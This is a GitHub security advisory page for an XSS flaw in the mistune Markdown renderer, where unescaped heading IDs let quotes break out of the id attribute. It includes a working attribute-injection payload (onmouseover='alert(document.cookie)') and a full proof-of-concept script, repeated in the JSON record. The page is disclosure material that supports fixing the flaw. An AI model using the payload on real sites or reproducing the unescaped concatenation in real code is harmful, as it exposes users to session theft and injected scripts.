GHSA-V87V-83H2-53W7

Vulnerability from github – Published: 2026-05-09 00:13 – Updated: 2026-05-09 00:13
VLAI?
Summary
Mistune Heading ID Attribute has Injection XSS
Details

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py

def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'    # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"

The text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as &quot; etc. But _id arrives as a raw string directly from whatever the heading_id callback returned — no escaping occurs at any point in the pipeline.

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)

Output — ID is auto-generated, no user text appears in it:

<h2 id="toc_1">Introduction</h2>

Step 2 — Add the realistic trigger: a text-based heading_id callback

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:

def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text contains a double-quote followed by an injected attribute:

## foo" onmouseover="alert(document.cookie)" x="

When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.

Step 4 — Observe attribute breakout in the output

ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)

Actual output:

<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>

Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.

Script

A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.

#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook

def raw_id(token, index):
    return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src  = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)

print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src  = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)

print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example Usage:

python poc.py

Once the script is run, open report_h2.html in the browser and observe the behaviour.

Impact

Dimension Assessment
Confidentiality Session cookie / auth token theft via JavaScript execution triggered on mouse interaction
Integrity DOM manipulation, phishing content injection, forced navigation
Availability Page freeze or crash available to attacker

Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.2.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "mistune"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44897"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-09T00:13:12Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n`HTMLRenderer.heading()` builds the opening `\u003chN\u003e` tag by string-concatenating the `id` attribute value directly into the HTML \u2014 with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `\"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element.\n\nThe default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, \u2026) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself \u2014 to produce human-readable slug anchors like `#installation` or `#getting-started` \u2014 is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute.\n\n## Details\n**File:** `src/mistune/renderers/html.py`\n\n```python\ndef heading(self, text: str, level: int, **attrs: Any) -\u003e str:\n    tag = \"h\" + str(level)\n    html = \"\u003c\" + tag\n    _id = attrs.get(\"id\")\n    if _id:\n        html += \u0027 id=\"\u0027 + _id + \u0027\"\u0027    # \u2190 _id is never escaped\n    return html + \"\u003e\" + text + \"\u003c/\" + tag + \"\u003e\\n\"\n```\n\nThe `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `\u0026quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned \u2014 no escaping occurs at any point in the pipeline.\n\n## PoC\n**Step 1 \u2014 Establish the baseline (safe default IDs)**\n\nThe script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs:\n\n```python\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, \u2026\n\nbl_src = \"## Introduction\\n\"\nbl_out, _ = md_safe.parse(bl_src)\n```\n\nOutput \u2014 ID is auto-generated, no user text appears in it:\n```html\n\u003ch2 id=\"toc_1\"\u003eIntroduction\u003c/h2\u003e\n```\n\n**Step 2 \u2014 Add the realistic trigger: a text-based `heading_id` callback**\n\nDeriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version \u2014 return the raw heading text unchanged \u2014 to show the vulnerability without any extra transformation:\n\n```python\ndef raw_id(token, index):\n    return token.get(\"text\", \"\")   # returns raw heading text as the ID\n\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n```\n\n**Step 3 \u2014 Craft the exploit payload**\n\nConstruct a heading whose text contains a double-quote followed by an injected attribute:\n\n```\n## foo\" onmouseover=\"alert(document.cookie)\" x=\"\n```\n\nWhen `raw_id` is called, `token[\"text\"]` is `foo\" onmouseover=\"alert(document.cookie)\" x=\"`. This is passed verbatim to `heading()` as the `id` attribute value.\n\n**Step 4 \u2014 Observe attribute breakout in the output**\n\n```python\nex_src = \u0027## foo\" onmouseover=\"alert(document.cookie)\" x=\"\\n\u0027\nex_out, _ = md_vuln.parse(ex_src)\n```\n\nActual output:\n```html\n\u003ch2 id=\"foo\" onmouseover=\"alert(document.cookie)\" x=\"\"\u003efoo\u0026quot; onmouseover=\u0026quot;alert(document.cookie)\u0026quot; x=\u0026quot;\u003c/h2\u003e\n```\n\nNote: the heading **body text** is correctly escaped (`\u0026quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted.\n\n### Script \n\nA verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.\n\n```python\n#!/usr/bin/env python3\n\"\"\"H2: HTMLRenderer.heading() inserts the id= value verbatim \u2014 no escaping.\"\"\"\nimport os, html as h\nfrom mistune import create_markdown\nfrom mistune.toc import add_toc_hook\n\ndef raw_id(token, index):\n    return token.get(\"text\", \"\")\n\n# --- baseline ---\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)\n\nbl_file = \"baseline_h2.md\"\nbl_src  = \"## Introduction\\n\"\nwith open(os.path.join(os.getcwd(), bl_file), \"w\") as f:\n    f.write(bl_src)\nbl_out, _ = md_safe.parse(bl_src)\n\nprint(f\"[{bl_file}]\\n{bl_src}\")\nprint(\"[output \u2014 id=toc_1, no user content, safe]\")\nprint(bl_out)\n\n# --- exploit ---\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n\nex_file = \"exploit_h2.md\"\nex_src  = \u0027## foo\" onmouseover=\"alert(document.cookie)\" x=\"\\n\u0027\nwith open(os.path.join(os.getcwd(), ex_file), \"w\") as f:\n    f.write(ex_src)\nex_out, _ = md_vuln.parse(ex_src)\n\nprint(f\"[{ex_file}]\\n{ex_src}\")\nprint(\"[output \u2014 heading_id returns raw text, id= not escaped]\")\nprint(ex_out)\n\n# --- HTML report ---\nCSS = \"\"\"\nbody{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}\nh1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}\np.desc{color:#555;font-size:.9em;margin-top:6px}\n.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}\n.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}\n.baseline .case-header{background:#d1fae5;color:#065f46}\n.exploit  .case-header{background:#fee2e2;color:#7f1d1d}\n.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}\n.panel{padding:16px}\n.panel+.panel{border-left:1px solid #eee}\n.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}\npre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}\n.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}\n.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}\n\"\"\"\n\ndef case(kind, label, filename, src, out):\n    return f\"\"\"\n\u003cdiv class=\"case {kind}\"\u003e\n  \u003cdiv class=\"case-header\"\u003e{\u0027BASELINE\u0027 if kind==\u0027baseline\u0027 else \u0027EXPLOIT\u0027} \u2014 {h.escape(label)}\u003c/div\u003e\n  \u003cdiv class=\"panels\"\u003e\n    \u003cdiv class=\"panel\"\u003e\n      \u003ch3\u003eInput \u2014 {h.escape(filename)}\u003c/h3\u003e\n      \u003cpre\u003e{h.escape(src)}\u003c/pre\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"panel\"\u003e\n      \u003ch3\u003eOutput \u2014 HTML source\u003c/h3\u003e\n      \u003cpre\u003e{h.escape(out)}\u003c/pre\u003e\n      \u003cdiv class=\"rlabel\"\u003e\u2193 rendered in browser (hover the heading to trigger onmouseover)\u003c/div\u003e\n      \u003cdiv class=\"rendered\"\u003e{out}\u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\u003c/div\u003e\"\"\"\n\npage = f\"\"\"\u003c!DOCTYPE html\u003e\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003cmeta charset=\"UTF-8\"\u003e\n\u003ctitle\u003eH2 \u2014 Heading ID XSS\u003c/title\u003e\u003cstyle\u003e{CSS}\u003c/style\u003e\u003c/head\u003e\u003cbody\u003e\n\u003ch1\u003eH2 \u2014 Heading ID XSS (unescaped id= attribute)\u003c/h1\u003e\n\u003cp class=\"desc\"\u003eHTMLRenderer.heading() in renderers/html.py does html += \u0027 id=\"\u0027 + _id + \u0027\"\u0027 with no escaping.\nTriggered when heading_id callback returns raw heading text \u2014 the most common doc-generator pattern.\u003c/p\u003e\n{case(\"baseline\", \"Clean heading \u2192 sequential id=toc_1, safe\", bl_file, bl_src, bl_out)}\n{case(\"exploit\",  \"Malicious heading \u2192 quotes break out of id=, onmouseover injected\", ex_file, ex_src, ex_out)}\n\u003c/body\u003e\u003c/html\u003e\"\"\"\n\nout_path = os.path.join(os.getcwd(), \"report_h2.html\")\nwith open(out_path, \"w\") as f:\n    f.write(page)\nprint(f\"\\n[report] {out_path}\")\n```\n\nExample Usage:\n```bash\npython poc.py\n```\n\nOnce the script is run, open `report_h2.html` in the browser and observe the behaviour.\n\n## Impact\n| Dimension        | Assessment |\n|------------------|-----------|\n| **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |\n| **Integrity**    | DOM manipulation, phishing content injection, forced navigation |\n| **Availability** | Page freeze or crash available to attacker |\n\n**Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune\u0027s `heading_id` callback without independently sanitising the returned value.",
  "id": "GHSA-v87v-83h2-53w7",
  "modified": "2026-05-09T00:13:12Z",
  "published": "2026-05-09T00:13:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lepture/mistune/security/advisories/GHSA-v87v-83h2-53w7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lepture/mistune"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mistune Heading ID Attribute has Injection XSS"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…